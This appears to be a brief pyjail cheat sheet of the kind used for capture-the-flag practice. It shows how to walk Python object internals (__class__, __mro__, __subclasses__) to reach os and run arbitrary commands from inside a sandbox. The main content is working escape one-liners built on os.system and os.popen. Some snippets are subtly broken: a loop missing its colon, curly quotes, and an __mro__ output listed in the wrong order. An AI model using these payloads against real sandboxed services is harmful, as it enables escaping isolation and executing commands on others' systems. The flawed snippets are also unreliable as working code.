Navigating Python Objects

Navigate python objects and some tricks to bypass python sandbox protections, pyjails.

Methods

Methods	Description
__class__	Returns the object (class) to which the type belongs.
__mro__	Returns a tuple containing the base class inherited by the object. Methods are parsed in tuple order.
__subclasses__	Each new class retains references to subclasses, and this method returns a list of references still available in the class.
__builtins__	Returns the builtin methods included in a function.
__globals__	A reference to a dictionary that contains global variables for a function.
__base__	Returns the base class inherited from the object (__ base__ and __ mro__ are used to find the base class).
__init__	Class initialization method.

dir() command to show all methods and attributes of the object.

Navigation

Goal: Find warnings (catch_warnings) because it imports the sys module (see HERE), and from sys you can reach os.

Get the string class

''.__class__
# <class ‘str’>

Going up by getting the inherited base classes (object)

''.__class__.__mro__
# [<class ‘object'> <class ‘str’> ]

Get all subclasses of object

''.__class__.__mro__[1].__subclasses__()
# [<class ‘…’> …]

Look for catch_warnings and its index.

for i in range(450)
   print(i, end=' ') 
   print(''.__class__.__mro__[1].__subclasses__()[i].__name__)
# index  NAME
# index  NAME 
# etc…

Import os and call the system. You can't see the output.

''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').system("COMMAND")
# error_code or 0 if the command was executed correctly

Import os and call popen with read(). You can see the output.

''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').popen("COMMAND").read()

Resources

• Salvatore Abello - pyjails
• HackTricks
• pyjailbreaker (yet to be seen)